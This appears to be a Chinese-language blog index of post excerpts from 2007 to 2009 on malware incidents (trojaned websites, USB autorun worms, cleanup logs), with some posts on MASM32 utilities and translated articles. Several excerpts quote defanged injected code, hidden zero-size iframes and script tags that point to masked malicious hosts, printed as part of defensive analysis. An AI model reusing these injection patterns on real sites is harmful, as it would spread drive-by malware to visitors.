其他

某交通違法查詢網頁被掛馬Virus.Win32.AutoRun.xu等endurer 原創2007-10-26 第1版問題出在該網頁所用的計數器代碼上：/---＜script src="hxxp://www.h*c**jj***d.com/wfcx/count/online.asp"＞＜/script＞---/看看hxxp://www.h*c**jj***d.com/wfcx/count/online.asp 的代碼：/---＜iframe src=hxxp://user*.free.77**1

　　從6.0 SP2開始，IE 不再支援view-source：協議，雖然 FireFox仍然支援該協議，但為此而安裝 FireFox又實在是小題大作……　　於是我採用MASM32編寫了這個檔案大小僅為 5632 位元組的 網頁原始碼查看程式——HttpRead1：http://purpleendurer.ys168.com2：http://download.csdn.net/source/315146檔案說明符 : F:/masm32/peworks/http/HttpRead.exe屬性 :

RichEdit控制項在處理EM_REPLACESEL訊息中有bug?附一種解決辦法Purple Endurer 原創2007-10-27 第1版在 CmdShell 和 bat_do 中，命令的執行結果會通過EM_REPLACESEL訊息添加到RichEdit控制項編輯框中，但 ping 等一些命令的執行結果添加到RichEdit控制項編輯框中會顯示在同一行。經對比分析ping 等一些命令的執行結果和添加到RichEdit控制項編輯框中的結果，發現出現問題的原因在於：ping

抓到通過隨身碟傳播的 Virus.Win32.AutoRun.ab/Worm.Win32.Agent.zhw/setup.exeendurer 原創2007-12-25 第1版在一位同事拿來拷檔案的隨身碟中發現的。把隨身碟接入電腦後，先運行WinRAR檢查隨身碟，發現其中有檔案autorun.inf，查看檔案內容，發現要啟動並執行檔案是setup.exe。檔案說明符 : G:/setup.exe屬性 : -SH-擷取檔案版本資訊大小失敗!建立時間 : 2007-12-20

1.4.4005(16384 位元組， MD5：62ef253a5e9c88d9d0299762b0d10336)1.修正了按映像名稱排序顯示不正確的bug2.在Windows XP中可以顯示被瑞星殺毒軟體保護的QQ等進程對應的完整檔案說明符ProcView 是用MASM32編寫的免費系統進程監控程式，可顯示WIN

用MASM32寫的 系統托盤表徵圖管理員 TrayIconMan 0.0.0001　　主要功能是列舉系統托盤區中的表徵圖，提示文本，及它們對應的程式，並控制它們的顯示和隱藏狀態。　　此程式可以在 Win 2000 和 Win XP 上運行，Vista 沒有測試。　　在編程過程中發現不管是在 Win 2000中，還是在Win XP中，均無法擷取瑞星反病毒軟體放在系統托盤的即時監控表徵圖……在 TrayIconMan

譯＞讓網路更安全的八個日常步驟作者：Mike Mullins翻譯：endurer 2007-11-01 第1版分類：入侵檢測，風險管理，安全解決方案標籤：安全，網路，邁克·穆林http://blogs.techrepublic.com.com/security/?p=337&tag=nl.e102在當今這個互聯世界，駭客是每周7天，每天24小時的生意。不論是否為工作或是業餘愛好，駭客不會按時上下班。《endurer註：1。punch a

小心QQ上傳播的 1407.rar / 我的照片.Exe / Trojan-PSW.Win32.Delf.agh / Worm.Win32.PaBug.cnendurer 原創2007-11-02 第2版 補充瑞星的回複2007-11-02 第1版QQ上收到資訊：/---ｗｗｗ.ｆ**ｄｇａ*ｅａ.ｏｒｇ.ｃｎ/1407.rar這裡有我的照片幫我頂下記得回複我哦點擊就可下載---/下載過程中 Kaspersky 報告：/---已檢測到: 木馬程式

某驅動開發網被掛馬Trojan.DL.Win32.Small.gkmendurer 原創2008-01-23 第1版開啟該網站，Kaspersky報告：2008-1-21 14:30:41 惡意 HTTP 對象 ＜hxxp://list**.ad*s**looks.info/list.js＞: 已檢測 木馬程式 Trojan-Downloader.JS.Small.js.檢查網站首頁代碼，發現：/---＜SCRIPT LANGUAGE="javascript1.2"

開發人員們，測試員們正在測試你們的耐心？作者：Sonja Thompson翻譯：PurpleEndurer，2009-06-09 第1版標籤: 開發人員, 測試人員, Sonja

25jurdcyw4.sys,promote.dll/Adware.Win32.Agent.nrc,mnbgezuvepffc.dll/AdWare.Win32.EJok.x等endurer 原創2008-01-06 第1版　　有位網友發email來說他的電腦最近開機時出現出錯提示框，說C:/WINDOWS/system32/****.dll 無法載入，****這個是數位，記不清了。經朋友介紹，在偶的blog上發現了類似問題的解決方案的文章繞過IceSword檔案檢測的Trojan.Win32.

巴馬某神酒業有限責任公司網站被掛馬Worm.Win32.Downloader/Trojan.Win32.Mnlessendurer 原創2007-12-13 第1版檢查首頁代碼，發現被多次加入代碼：/--- <ifame src=hxxp://A**A.ll*sging**.com/ww/new05.htm?075 widTh=1 naMe='6005' height=1＞＜/iframe＞<ifame src=hxxp://A**A.ll*sging**.com/ww/new05.

用MASM32寫GUI版的netstat--NetViewG.exe v0.0.0001 beta11：http://download.csdn.net/source/3619702：http://purpleendurer.ys168.com/ 的tools目錄下先前發了一個CUI的版本,見:用 MASM32 寫的 4.5KB 的

MASM32編程用兩種方法運行外部程式並等待其結束 PurpleEndurer 原創2009-06-08 第1版 在實現DelUninstall的卸載軟體功能時，我們需要運行軟體所指定的卸載程式，並等待其進程結束。 在用API函數WaitForSingleObject來等卸載程式進程結束時：   DWORD WaitForSingleObject(　HANDLE hHandle, // 等待對象的控制代碼　DWORD dwMilliseconds // 等待毫秒數，INFINITE表示無限等待)

ARP病毒所加網址傳播Worm.Win32.Anilogo,Win32.Logogo.q等endurer 原創2007-12-17 第1版一位網友說他孤電腦網路路由器DHCP擷取不到ip地址,網速超慢，重新連線路由器後開啟所有網站，Kaspersky 報告：/---2007-12-14 17:45:23 惡意 HTTP 對象 ＜hxxp://***.8***v*8.biz/2.htm＞: 已檢測 木馬程式 Trojan-Downloader.JS.Psyme.ck.2007-12-14 17:4

遭遇auto.exe,winforms.dll,zinforms.dll,LYLoader.exe,LYLoadbr.exe等/4endurer 原創2007-10-11 第1版(續3)DrWeb CureIt! 掃蕩完了，還得做些清理工作。運行瑞星卡卡安全助手，在 進階功能—＞[外掛程式管理及卸載] 裡把 O2 和 O24

某可人官方網站掛馬Trojan-PSW.Win32.OnLineGames.sbgendurer 原創2008-02-29 第1版1.網站首頁包含代碼：/---＜iframe src=hxxp://pop**.i**ms**e*e*.cc/g3.htm width=100 height=0＞＜/iframe＞---/1.1 hxxp://pop**.i**ms**e*e*.cc/g3.htm 包含代碼：/---＜iframe src=news.html width=100 height=0＞＜/

你最拿手的5種程式設計語言是什嗎？作者：Chip Camden翻譯：Purple Endurer標籤：程式設計語言, 語言, 編程, Lisp, 開發工具, 軟體開發,軟體/網站開發, Chip

遭遇 NinSys74.Sys,B674A2D4.EXE,42AE09E4.DLL,msavp.dll,avpdj.dll,avpwl.dll等endurer 原創2007-10-12 第1版昨天中午又幫兩位網友清理電腦病毒。先回憶一下其中一位的。網友的電腦上裝有瑞星2007殺毒軟體，不過是已經到期的下載版。下載 pe_xscan 的 log 中發現如下可疑項：/===pe_xscan 07-08-30 by Purple Endurer2007-10-11 13:45:14Windows

感染explorer.exe,使用映像劫持,ShellExecHook…的AV殺手GRHSGIH.EXE3endurer 原創2008-01-22 第1版 部分惡意程式檔案資訊，瑞星的反應比Kaspersky要出色……檔案說明符 : C:/WINDOWS/LotusHlp.exe屬性 : A---擷取檔案版本資訊大小失敗!建立時間 : 1999-1-18 11:59:12修改時間 : 1999-1-18 11:59:10訪問時間 : 1999-1-18 12:29:37大小 : 17684